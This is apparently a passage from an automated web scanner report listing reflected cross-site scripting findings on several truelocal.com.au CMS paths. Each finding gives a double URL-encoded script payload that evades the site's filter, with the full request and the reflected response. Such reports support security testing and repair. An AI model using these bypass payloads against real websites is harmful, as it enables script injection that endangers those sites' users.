The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload de023%253cscript%253ealert%25281%2529%253c%252fscript%253ece4db33b947 was submitted in the REST URL parameter 2. This input was echoed as de023<script>alert(1)</script>ce4db33b947 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/faqde023%253cscript%253ealert%25281%2529%253c%252fscript%253ece4db33b947 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:20 GMT
Content-Length: 19612
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>ce4db33b947 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=faqde023<script>alert(1)</script>ce4db33b947
</div>
...[SNIP]...

1.364. http://www.truelocal.com.au/cms/faq/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/faq/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 6a8e2%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecf28cd430b4 was submitted in the REST URL parameter 2. This input was echoed as 6a8e2--><script>alert(1)</script>cf28cd430b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/faq6a8e2%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecf28cd430b4/ HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:02 GMT
Content-Length: 19660
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>cf28cd430b4 -->
...[SNIP]...

1.365. http://www.truelocal.com.au/cms/faq/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/faq/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload de216%253cscript%253ealert%25281%2529%253c%252fscript%253e9d661c8f533 was submitted in the REST URL parameter 2. This input was echoed as de216<script>alert(1)</script>9d661c8f533 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/faqde216%253cscript%253ealert%25281%2529%253c%252fscript%253e9d661c8f533/ HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:58 GMT
Content-Length: 19615
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>9d661c8f533 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=faqde216<script>alert(1)</script>9d661c8f533
</div>
...[SNIP]...

1.366. http://www.truelocal.com.au/cms/get-quotes [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/get-quotes

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3ae74%253cscript%253ealert%25281%2529%253c%252fscript%253e605013a9190 was submitted in the REST URL parameter 2. This input was echoed as 3ae74<script>alert(1)</script>605013a9190 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/get-quotes3ae74%253cscript%253ealert%25281%2529%253c%252fscript%253e605013a9190 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:13 GMT
Content-Length: 19647
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>605013a9190 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=get-quotes3ae74<script>alert(1)</script>605013a9190
</div>
...[SNIP]...

1.367. http://www.truelocal.com.au/cms/get-quotes [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/get-quotes

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload b7bab%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4bbb9ef29b was submitted in the REST URL parameter 2. This input was echoed as b7bab--><script>alert(1)</script>4bbb9ef29b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/get-quotesb7bab%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4bbb9ef29b HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:17 GMT
Content-Length: 19687
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>4bbb9ef29b -->
...[SNIP]...

1.368. http://www.truelocal.com.au/cms/local-star-reviewer [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/local-star-reviewer

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c4ba9%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed9febc5aec4 was submitted in the REST URL parameter 2. This input was echoed as c4ba9--><script>alert(1)</script>d9febc5aec4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/local-star-reviewerc4ba9%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed9febc5aec4 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:56 GMT
Content-Length: 19737
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>d9febc5aec4 -->
...[SNIP]...

1.369. http://www.truelocal.com.au/cms/local-star-reviewer [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/local-star-reviewer

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 17ccf%253cscript%253ealert%25281%2529%253c%252fscript%253ea0336324473 was submitted in the REST URL parameter 2. This input was echoed as 17ccf<script>alert(1)</script>a0336324473 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/local-star-reviewer17ccf%253cscript%253ealert%25281%2529%253c%252fscript%253ea0336324473 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:52 GMT
Content-Length: 19692
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>a0336324473 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=local-star-reviewer17ccf<script>alert(1)</script>a0336324473
</div>
...[SNIP]...

1.370. http://www.truelocal.com.au/cms/media-centre [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/media-centre

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee6a9%253cscript%253ealert%25281%2529%253c%252fscript%253eea03e4ee2cb was submitted in the REST URL parameter 2. This input was echoed as ee6a9<script>alert(1)</script>ea03e4ee2cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/media-centreee6a9%253cscript%253ealert%25281%2529%253c%252fscript%253eea03e4ee2cb HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:19 GMT
Content-Length: 19657
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>ea03e4ee2cb -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=media-centreee6a9<script>alert(1)</script>ea03e4ee2cb
</div>
...[SNIP]...

1.371. http://www.truelocal.com.au/cms/media-centre [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/media-centre

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 9b119%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2114a3a52d6 was submitted in the REST URL parameter 2. This input was echoed as 9b119--><script>alert(1)</script>2114a3a52d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/media-centre9b119%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2114a3a52d6 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:22 GMT
Content-Length: 19702
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>2114a3a52d6 -->
...[SNIP]...

1.372. http://www.truelocal.com.au/cms/mobile [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/mobile

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload ea41b%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed0cb49eeba6 was submitted in the REST URL parameter 2. This input was echoed as ea41b--><script>alert(1)</script>d0cb49eeba6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/mobileea41b%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed0cb49eeba6 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:18 GMT
Content-Length: 19672
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>d0cb49eeba6 -->
...[SNIP]...

1.373. http://www.truelocal.com.au/cms/mobile [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/mobile

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4ab47%253cscript%253ealert%25281%2529%253c%252fscript%253e515390b9510 was submitted in the REST URL parameter 2. This input was echoed as 4ab47<script>alert(1)</script>515390b9510 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/mobile4ab47%253cscript%253ealert%25281%2529%253c%252fscript%253e515390b9510 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:14 GMT
Content-Length: 19627
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>515390b9510 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=mobile4ab47<script>alert(1)</script>515390b9510
</div>
...[SNIP]...

1.374. http://www.truelocal.com.au/cms/mobile/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/mobile/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7785d%253cscript%253ealert%25281%2529%253c%252fscript%253e4e426f329e7 was submitted in the REST URL parameter 2. This input was echoed as 7785d<script>alert(1)</script>4e426f329e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/mobile7785d%253cscript%253ealert%25281%2529%253c%252fscript%253e4e426f329e7/ HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:50 GMT
Content-Length: 19630
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>4e426f329e7 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=mobile7785d<script>alert(1)</script>4e426f329e7
</div>
...[SNIP]...

1.375. http://www.truelocal.com.au/cms/mobile/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/mobile/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload cdae6%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eca7141a9cca was submitted in the REST URL parameter 2. This input was echoed as cdae6--><script>alert(1)</script>ca7141a9cca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/mobilecdae6%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eca7141a9cca/ HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:53 GMT
Content-Length: 19675
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>ca7141a9cca -->
...[SNIP]...

1.376. http://www.truelocal.com.au/cms/newsletter [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/newsletter

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload f4da9%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e870f52a0974 was submitted in the REST URL parameter 2. This input was echoed as f4da9--><script>alert(1)</script>870f52a0974 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/newsletterf4da9%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e870f52a0974 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:55 GMT
Content-Length: 19692
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>870f52a0974 -->
...[SNIP]...

1.377. http://www.truelocal.com.au/cms/newsletter [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/newsletter

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b818a%253cscript%253ealert%25281%2529%253c%252fscript%253ef6418ed9be5 was submitted in the REST URL parameter 2. This input was echoed as b818a<script>alert(1)</script>f6418ed9be5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/newsletterb818a%253cscript%253ealert%25281%2529%253c%252fscript%253ef6418ed9be5 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:07:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:07:52 GMT
Content-Length: 19647
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>f6418ed9be5 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=newsletterb818a<script>alert(1)</script>f6418ed9be5
</div>
...[SNIP]...

1.378. http://www.truelocal.com.au/cms/policies [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/policies

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 78668%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9cde6b0c965 was submitted in the REST URL parameter 2. This input was echoed as 78668--><script>alert(1)</script>9cde6b0c965 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/policies78668%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9cde6b0c965 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:27 GMT
Content-Length: 19682
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>9cde6b0c965 -->
...[SNIP]...

1.379. http://www.truelocal.com.au/cms/policies [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/policies

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d7b36%253cscript%253ealert%25281%2529%253c%252fscript%253e9cc2a060a02 was submitted in the REST URL parameter 2. This input was echoed as d7b36<script>alert(1)</script>9cc2a060a02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/policiesd7b36%253cscript%253ealert%25281%2529%253c%252fscript%253e9cc2a060a02 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:24 GMT
Content-Length: 19637
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
</script>9cc2a060a02 -->
I/O Error - java.io.FileNotFoundException: http://localhost:8080/cms-web/media-view.action?seoURL=policiesd7b36<script>alert(1)</script>9cc2a060a02
</div>
...[SNIP]...

1.380. http://www.truelocal.com.au/cms/privacy-policy [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/privacy-policy

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 6dc4d%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edc62b5be8a1 was submitted in the REST URL parameter 2. This input was echoed as 6dc4d--><script>alert(1)</script>dc62b5be8a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cms/privacy-policy6dc4d%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edc62b5be8a1 HTTP/1.1
Host: www.truelocal.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:08:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:08:28 GMT
Content-Length: 19712
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<link rel="shortcut icon" href="/style/img/favicon.ico?v=8.5"/>
...[SNIP]...
<script>alert(1)</script>dc62b5be8a1 -->
...[SNIP]...

1.381. http://www.truelocal.com.au/cms/privacy-policy [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.truelocal.com.au
Path:	/cms/privacy-policy

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ef381%253cscript%253ealert%25281%2529%253c%252fscript%253eed2d1b28db1 was submitted in the REST URL parameter 2. This input was echoed as ef381<script>alert(1)</script>ed2d1b28db1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

